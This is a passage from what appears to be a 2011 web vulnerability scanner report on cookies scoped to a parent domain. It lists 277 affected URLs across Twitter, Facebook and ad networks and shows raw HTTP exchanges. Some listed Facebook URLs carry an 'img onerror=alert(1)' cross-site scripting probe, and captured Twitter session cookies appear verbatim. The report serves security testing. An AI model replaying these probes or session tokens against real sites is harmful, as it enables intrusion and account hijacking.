Cookie: anj=Kfu=8fG7vhgj[2<?0P(*AuB-u**g1:XIEGDEhzW()U9M1kUGf3$2.f0R>9.acl`F4%p2Nl.UXEE*e?s.KZk)1P8:JhD>3]0OXTvN!yxE%+(uoie>W`_v8QfQ%yo5xj:Z3>gd/L60<:0H$58xf@TP8EN^Aa7.qES'cu)ziVp`aanbh'IXK_')9#*'OqB0__+7d).vaGpBe9>V?b=^3-#H@!=%>IE/HM`)s3*[`hUEAwY-atIxWZl9RF$+OaI:l_Qcc9wmRBbW$qm9'55djeSa8ZQ96*Jp)C^/<CN-yHf5FURTYHOv]@%<7Aq6u^k]-O]7X=2zKSL4quR8kO_D>X[HvK1.Z8LyTgPDtFmwP=9UjfKherrC(!HN)-rs$$.Z4RwKgg$hjvE=h]Y3^aGI31FC_+(AsbutS4%o=cG=F6ppp35v0Hp53EQnWXio#:w1_scIl_O(gee'(4OTfW/q:Rz1+w6b.Vi<p.T*C2GR6e]tqP0@3dSr9ox*G.!htZ]Mz+FTi@UGkKz@XApYJmq$=Vw>B=cnuV1(XHu?f9kld6tUGu]mWIwdMo@:9[ns]Nq8sV$[>K:4>wF](16qdoZ$6'I1F:`tO4!]q; icu=ChII-sEBEAoYCiAKKAowg_iG7gQQg_iG7gQYCQ..; uuid2=2724386019227846218; sess=1;

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 06-May-2011 10:53:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 03-Aug-2011 10:53:10 GMT; domain=.adnxs.com; HttpOnly
Location: http://a2f90a939365257d7/a?1=1
Date: Thu, 05 May 2011 10:53:10 GMT
Content-Length: 0
Connection: close

16. Cookie scoped to parent domain previous next
There are 277 instances of this issue:

http://api.twitter.com/
http://api.twitter.com/1/statuses/66119447177474049/retweeted_by.json
http://api.twitter.com/1/statuses/show.json
http://api.twitter.com/1/statuses/user_timeline.json
http://t.mookie1.com/t/v1/imp
http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/
http://www.mapquest.com/
http://www.mapquest.com/_svc/ad/getads
http://www.mapquest.com/_svc/apixel
http://www.mapquest.com/_svc/publishing/promo
http://www.mapquest.com/_svc/searchio
http://www.mapquest.com/cdn/_uac/adpage.htm
http://www.mapquest.com/cdn/dotcom3/images/new_purple_button.jpg
http://www.mapquest.com/icons/stop.png
http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php
http://abcnews.go.com/Entertainment/popup
http://add.my.yahoo.com/content
http://ads.pointroll.com/PortalServe/
https://adwords.google.com/select/Login
http://adx.adnxs.com/mapuid
http://altfarm.mediaplex.com/ad/ck/10105-123060-1629-2
http://altfarm.mediaplex.com/ad/js/10105-123060-1629-2
http://altfarm.mediaplex.com/ad/js/10105-123060-1629-6
http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6
http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0
http://altfarm.mediaplex.com/ad/tr/10105-123060-1629-13
http://altfarm.mediaplex.com/ad/tr/10105-123060-1629-14
http://aol.worldwinner.com/cgi/welcome/21sie
http://aolmobile.aol.com/registration/changeSettings
http://aolmobile.aol.com/registration/deleteDevice
http://aolmobile.aol.com/registration/generateConfCode
http://aolmobile.aol.com/registration/validateConfirmCode
http://apartments.rentedspaces.oodle.com/
http://ar-ar.facebook.com/login.php
http://ar.voicefive.com/b/wc_beacon.pli
http://ar.voicefive.com/bmx3/broker.pli
http://ar.voicefive.com/bmx3/broker.pli
http://b.aol.com/vanity/
http://b.dailyfinance.com/vanity/
http://b.huffingtonpost.com/vanity/
http://b.mmafighting.com/vanity/
http://b.scorecardresearch.com/b
http://b.scorecardresearch.com/p
http://b.scorecardresearch.com/r
http://b.voicefive.com/b
http://bid.openx.net/json
http://blogsearch.google.com/
http://books.google.com/bkshp
http://books.google.com/books
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://cdn4.eyewonder.com/cm/js/10295-119241-2568-4
http://clk.atdmt.com/CNT/go/319709115/direct
http://clk.atdmt.com/M0N/go/314366790/direct
http://clk.atdmt.com/NYC/go/310177527/direct
http://clk.atdmt.com/go/253735206/direct
http://clk.atdmt.com/go/253735225/direct
http://clk.atdmt.com/go/253735228/direct
http://clk.atdmt.com/go/310177527/direct
http://clk.atdmt.com/go/314366790/direct
http://clk.atdmt.com/go/319709115/direct
http://developers.facebook.com/
http://developers.facebook.com/plugins/
http://feedburner.google.com/fb/a/mailverify
http://fls.doubleclick.net/activityi
http://fusion.google.com/add
http://googleads.g.doubleclick.net/aclk
http://graph.facebook.com/10134017/picture
http://groups.google.com/grphp
http://ib.adnxs.com/getuid
http://ib.adnxs.com/seg
http://id.google.com/verify/EAAAAC-C2hTTg1_wpgNVul6NqWU.gif
http://idcs.interclick.com/Segment.aspx
http://image3.pubmatic.com/AdServer/UPug
http://images.apple.com/global/nav/styles/navigation.css
http://leadback.advertising.com/adcedge/lb
https://maps-api-ssl.google.com/maps
http://maps.google.com/maps
http://picasaweb.google.com/data/feed/base/user/h02332/albumid/5537331698402427137
http://picasaweb.google.com/home
http://picasaweb.google.com/lh/view
http://pixel.quantserve.com/pixel
http://pixel.quantserve.com/pixel/p-3aud4J6uA4Z6Y.gif
http://pixel.quantserve.com/pixel/p-444Ux5EmpXDp6.gif
http://r1-ads.ace.advertising.com/click/site=0000743226/mnum=0000894907/cstr=63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,1_/xsxdata=1:93232707/bnum=63245784/optn=64
http://r1-ads.ace.advertising.com/click/site=0000743227/mnum=0000894905/cstr=97154103=_4dc1f637,3024464342,743227^894905^1183^0,1_/xsxdata=1:93310501/bnum=97154103/optn=64
http://r1-ads.ace.advertising.com/click/site=0000800563/mnum=0000894873/cstr=84248618=_4dc1f63b,0642027268,800563^894873^1183^0,1_/xsxdata=$xsxdata/bnum=84248618/optn=64
http://r1-ads.ace.advertising.com/click/site=0000804145/mnum=0000894875/cstr=24626462=_4dc1f67d,5365043223,804145^894875^1183^0,1_/xsxdata=1:93312584/bnum=24626462/optn=64
http://r1-ads.ace.advertising.com/click/site=0000804145/mnum=0000956559/cstr=31568465=_4dc1f67d,1346633562,804145^956559^1183^0,1_/xsxdata=1:93313567/bnum=31568465/optn=64
http://r1-ads.ace.advertising.com/site=743206/size=300250/u=2/bnum=47128691/xsxdata=1:93306656/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fwww.mapquest.com%252F%253Fncid%253Dtxtlnkmqmq00000001
http://r1-ads.ace.advertising.com/site=743207/size=300250/u=2/bnum=29138469/xsxdata=1:93241795/hr=12/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fmobile.aol.com%252Fproduct%252FAndroid%252Fdailyfinance%252F
http://r1-ads.ace.advertising.com/site=743207/size=300250/u=2/bnum=55333782/xsxdata=1:93241795/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fmobile.aol.com%252Fproduct%252FiPhone%252Fengadget%252F
http://r1-ads.ace.advertising.com/site=743226/size=728090/u=2/bnum=63245784/xsxdata=1:93232707/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fmusic.aol.com%252Fradioguide%252Fbb
http://r1-ads.ace.advertising.com/site=743227/size=300250/u=2/bnum=97154103/xsxdata=1:93310501/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Frealestate.aol.com%252F%253Ficid%253Dnavbar_realest_main5
http://r1-ads.ace.advertising.com/site=790523/size=300250/u=2/bnum=26673240/xsxdata=1:93310299/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/xscinfo=bsd:19931900/dref=http%253A%252F%252Fwww.mmafighting.com%252F2011%252F05%252F04%252Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%252F%253Ficid%253Dmaing-grid7%25257Cmain5%25257Cdl4%25257Csec3_lnk1%25257C60545
http://r1-ads.ace.advertising.com/site=790523/size=728090/u=2/bnum=35460744/xsxdata=1:93306882/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/xscinfo=bsd:19931900/dref=http%253A%252F%252Fwww.mmafighting.com%252F2011%252F05%252F04%252Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%252F%253Ficid%253Dmaing-grid7%25257Cmain5%25257Cdl4%25257Csec3_lnk1%25257C60545
http://r1-ads.ace.advertising.com/site=800563/size=300250/u=2/bnum=84248618/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.huffingtonpost.com%252F%253Ficid%253Dnavbar_huffpo_main5
http://r1-ads.ace.advertising.com/site=804145/size=300250/u=2/bnum=31568465/xsxdata=1:93313567/hr=0/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fwww.huffingtonpost.com%252F2011%252F05%252F04%252Fosama-bin-laden-pictures_n_857568.html
http://r1-ads.ace.advertising.com/site=804145/size=728090/u=2/bnum=24626462/xsxdata=1:93312584/hr=0/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fwww.huffingtonpost.com%252F2011%252F05%252F04%252Fosama-bin-laden-pictures_n_857568.html
http://realestate.aol.com/
http://scholar.google.com/schhp
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s32555036570411
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s34991793073713
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s41508008833043
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s41670060879550
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42057272375095
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42119171968661
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42397612622007
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42653564326465
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42715447763912
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42953626681119
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42998947284650
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43049185345880
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4310452240519
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43305702756624
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43513301596976
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43547210348770
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4364950429648
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43829343500547
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4407522239256
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4419304328970
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4424447611439
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s44325433499179
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s44696885943412
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s44929469036869
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45011387388221
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45177161318715
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45238099694252
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45327582890167
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45334947153460
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45375636194366
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45471094280947
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45570401758886
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45670967234764
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45689243038650
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45696645958814
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s46401418154127
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s46547738644294
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s46606079612392
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s46721464460715
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s46752376970835
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4694483816623
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s47134800327476
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s47243939966429
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s47805332352872
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s47930286049377
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s48242398074362
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4827615687157
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s48352218910586
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s48578549234662
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s48622659663669
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s48943998781032
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s49281189679168
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s49337460868991
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s49353421742562
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s49393149293027
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s49413108131848
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s49435746781527
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s49873315552249
http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s49904012384358
http://sportingnews.us.intellitxt.com/intellitxt/front.asp
http://tacoda.at.atwola.com/rtx/r.js
http://tags.bluekai.com/site/3200
http://tags.bluekai.com/site/450
https://us.etrade.com/e/t/welcome/whychooseetrade
http://video.google.com/
http://view.c3metrics.com/c3VTabstrct-6-2.php
http://www.facebook.com/
http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd
http://www.facebook.com/10000082482078341583<img%20src=a%20onerror=alert(1
http://www.facebook.com/10000082482078341583<img%20src=a%20onerror=alert(1)>ab0e5e0e0bd
http://www.facebook.com/1242845259
http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b
http://www.facebook.com/2008/fbml
http://www.facebook.com/AOLrealestate
http://www.facebook.com/BPAmerica
http://www.facebook.com/DailyFinance
http://www.facebook.com/HockeyKen
http://www.facebook.com/KickIceForever
http://www.facebook.com/LadyBonesie
http://www.facebook.com/Loizza
http://www.facebook.com/aim
http://www.facebook.com/ajax/intl/language_dialog.php
http://www.facebook.com/ajax/reg_birthday_help.php
http://www.facebook.com/ajax/register/logging.php
http://www.facebook.com/aol
http://www.facebook.com/aolradio
http://www.facebook.com/badges
http://www.facebook.com/burkerkink
http://www.facebook.com/campaign/landing.php
http://www.facebook.com/careers/
http://www.facebook.com/deedee.perez1
http://www.facebook.com/directory/pages/
http://www.facebook.com/directory/people/
http://www.facebook.com/facebook
http://www.facebook.com/fayse
http://www.facebook.com/find-friends
http://www.facebook.com/find-friends
http://www.facebook.com/gale.l.schenk
http://www.facebook.com/help/
http://www.facebook.com/help/
http://www.facebook.com/home.php
http://www.facebook.com/izaOllie
http://www.facebook.com/jezzas
http://www.facebook.com/kimberly.christ
http://www.facebook.com/ladonna.lokey
http://www.facebook.com/lakendra.roberts
http://www.facebook.com/login.php
http://www.facebook.com/login.php
http://www.facebook.com/mapquest
http://www.facebook.com/matthew.oliveira2
http://www.facebook.com/mmafighting
http://www.facebook.com/mobile
http://www.facebook.com/mobile/
http://www.facebook.com/mobile/
http://www.facebook.com/pages/Barnesville/115038011847083
http://www.facebook.com/pages/Beacon-of-Hope-Resource-Center/34194116820
http://www.facebook.com/pages/Bernicks-Pepsi/123296084349478
http://www.facebook.com/pages/Blaine-Senior-High/106189406087059
http://www.facebook.com/pages/Editor-in-Chief/137829579583400
http://www.facebook.com/pages/Gilco-Corporation/109823499042436
http://www.facebook.com/pages/HMFIC/149403761740008
http://www.facebook.com/pages/HuffPost-World/70242384902
http://www.facebook.com/pages/Manchester-Connecticut/112527912096312
http://www.facebook.com/pages/Merchandiser/123981654314779
http://www.facebook.com/pages/New-Haven-College/130105783687523
http://www.facebook.com/pages/Northern-Illinois-University/108155335871674
http://www.facebook.com/pages/San-Antonio-Texas/110297742331680
http://www.facebook.com/pages/School-of-Hard-Knocks-University-of-Life/115228431825707
http://www.facebook.com/pages/Sporting-News/104068362964496
http://www.facebook.com/pages/ToP-SeCNeT/195242630519520
http://www.facebook.com/pages/University-of-Chicago-Semester-in-Madrid/144554762263161
http://www.facebook.com/pages/create.php
http://www.facebook.com/pages/memorial-high-school-west-new-york-nj/114508558584580
http://www.facebook.com/patroyo
http://www.facebook.com/people/Alexander-Bucky%20-Jordan/1242845259
http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259
http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259
http://www.facebook.com/people/Bucky-Jordan%20/100000824820783
http://www.facebook.com/people/Bucky-Jordan/100000824820783
http://www.facebook.com/policy.php
http://www.facebook.com/privacy/explanation.php
http://www.facebook.com/profile.php
http://www.facebook.com/r.php
http://www.facebook.com/recover.php
http://www.facebook.com/robynalys
http://www.facebook.com/share.php
http://www.facebook.com/sharer.php
http://www.facebook.com/skdarealist
http://www.facebook.com/sportingnews
http://www.facebook.com/stefanoboscolomarchi
http://www.facebook.com/techcrunch
http://www.facebook.com/terms.php
http://www.facebook.com/theteebers
http://www.facebook.com/wmoppert
https://www.facebook.com/
https://www.facebook.com/ajax/intl/language_dialog.php
https://www.facebook.com/h02332
https://www.facebook.com/h02332
https://www.facebook.com/h02332
https://www.facebook.com/help/contact.php
https://www.facebook.com/login.php
https://www.facebook.com/pages/ToP-SeCNeT/195242630519520
https://www.facebook.com/pages/create.php
https://www.facebook.com/r.php
https://www.facebook.com/recover.php
https://www.godaddy.com/
https://www.godaddy.com/domains/search.aspx
https://www.godaddy.com/gdshop/hosting/landing.asp
https://www.godaddy.com/gdshop/registrar/search.asp
https://www.godaddy.com/gdshop/website.asp
http://www.google.com/finance
http://www.huffingtonpost.com/users/logout/
http://www.marketwatch.com/News/Story/Story.aspx
http://www.moviefone.com/
http://www.truveo.com/
http://www.truveo.com/search

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

16.1. http://api.twitter.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://api.twitter.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_twitter_sess=BAh7CjoMY3NyZl9pZCIlYzExNDEwZTU2MGMzZTAwODc5MDQxNWUxZDVkYzEy%250ANWM6DnJldHVybl90byI9aHR0cDovL3R3aXR0ZXIuY29tL0hlZWN0b29yMTAv%250Ac3RhdHVzZXMvNjYxMTk0NDcxNzc0NzQwNDk6D2NyZWF0ZWRfYXRsKwgAiTXA%250ALwE6B2lkIiU1ZWUyZGZhNmFlNmY3ZDA2OGY5OGZkMzM2M2FkZmI2YyIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7AA%253D%253D--e25c9608c35c992185266e68f57f4b2dcddac49b; domain=.twitter.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: api.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; guest_id=130314166807091166; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); auth_token=; __utma=43838368.551233229.1303561994.1303568398.1304617828.3; __utmc=43838368; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYzExNDEwZTU2MGMzZTAwODc5MDQxNWUxZDVkYzEy%250ANWM6DnJldHVybl90byI9aHR0cDovL3R3aXR0ZXIuY29tL0hlZWN0b29yMTAv%250Ac3RhdHVzZXMvNjYxMTk0NDcxNzc0NzQwNDk6D2NyZWF0ZWRfYXRsKwgAiTXA%250ALwEiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiU1ZWUyZGZhNmFlNmY3ZDA2OGY5OGZkMzM2%250AM2FkZmI2Yw%253D%253D--253a20e395e9e3ad595503b00398ea64e2518b85; __utmb=43838368.7.10.1304617828; k=173.193.214.243.1304470443436909;

Response

HTTP/1.0 200 OK
Date: Thu, 05 May 2011 13:01:48 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304600508-68009-30283
ETag: "8c8290204e3166bcf0e10bec724ac3d9"
Last-Modified: Thu, 05 May 2011 13:01:48 GMT
X-Runtime: 0.01076
Content-Type: text/html; charset=utf-8
Content-Length: 42972
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 95714beb9935a6e0cdc38e423f4769ee345dce06
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYzExNDEwZTU2MGMzZTAwODc5MDQxNWUxZDVkYzEy%250ANWM6DnJldHVybl90byI9aHR0cDovL3R3aXR0ZXIuY29tL0hlZWN0b29yMTAv%250Ac3RhdHVzZXMvNjYxMTk0NDcxNzc0NzQwNDk6D2NyZWF0ZWRfYXRsKwgAiTXA%250ALwE6B2lkIiU1ZWUyZGZhNmFlNmY3ZDA2OGY5OGZkMzM2M2FkZmI2YyIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7AA%253D%253D--e25c9608c35c992185266e68f57f4b2dcddac49b; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html >
<head>

<title>Twitter</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="utf-8" />

<script type="text/javascript" charset="utf-8">

...[SNIP]...

16.2. http://api.twitter.com/1/statuses/66119447177474049/retweeted_by.json previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://api.twitter.com
Path:	/1/statuses/66119447177474049/retweeted_by.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_twitter_sess=BAh7CjoMY3NyZl9pZCIlYzExNDEwZTU2MGMzZTAwODc5MDQxNWUxZDVkYzEy%250ANWM6DnJldHVybl90byI9aHR0cDovL3R3aXR0ZXIuY29tL0hlZWN0b29yMTAv%250Ac3RhdHVzZXMvNjYxMTk0NDcxNzc0NzQwNDk6D2NyZWF0ZWRfYXRsKwgAiTXA%250ALwEiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiU1ZWUyZGZhNmFlNmY3ZDA2OGY5OGZkMzM2%250AM2FkZmI2Yw%253D%253D--253a20e395e9e3ad595503b00398ea64e2518b85; domain=.twitter.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/66119447177474049/retweeted_by.json?count=15 HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
X-PHX: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130314166807091166; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); k=173.193.214.243.1304470443436909; __utma=43838368.551233229.1303561994.1303568398.1304617828.3; __utmc=43838368; __utmb=43838368.5.10.1304617828; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYzExNDEwZTU2MGMzZTAwODc5MDQxNWUxZDVkYzEy%250ANWM6DnJldHVybl90byI9aHR0cDovL3R3aXR0ZXIuY29tL0hlZWN0b29yMTAv%250Ac3RhdHVzZXMvNjYxMTk0NDcxNzc0NzQwNDk6D2NyZWF0ZWRfYXRsKwgAiTXA%250ALwE6B2lkIiU1ZWUyZGZhNmFlNmY3ZDA2OGY5OGZkMzM2M2FkZmI2YyIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7AA%253D%253D--e25c9608c35c992185266e68f57f4b2dcddac49b

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:50:39 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304599839-63994-13720
X-RateLimit-Limit: 1000
ETag: "d751713988987e9331980363e24189ce"-gzip
Last-Modified: Thu, 05 May 2011 12:50:39 GMT
X-RateLimit-Remaining: 914
X-Runtime: 0.00917
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114bc137096
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: fed15e03edbe1d943c09c55bbe7bf4f5e051822e
X-RateLimit-Reset: 1304603431
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYzExNDEwZTU2MGMzZTAwODc5MDQxNWUxZDVkYzEy%250ANWM6DnJldHVybl90byI9aHR0cDovL3R3aXR0ZXIuY29tL0hlZWN0b29yMTAv%250Ac3RhdHVzZXMvNjYxMTk0NDcxNzc0NzQwNDk6D2NyZWF0ZWRfYXRsKwgAiTXA%250ALwEiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiU1ZWUyZGZhNmFlNmY3ZDA2OGY5OGZkMzM2%250AM2FkZmI2Yw%253D%253D--253a20e395e9e3ad595503b00398ea64e2518b85; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 2

[]

16.3. http://api.twitter.com/1/statuses/show.json previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://api.twitter.com
Path:	/1/statuses/show.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

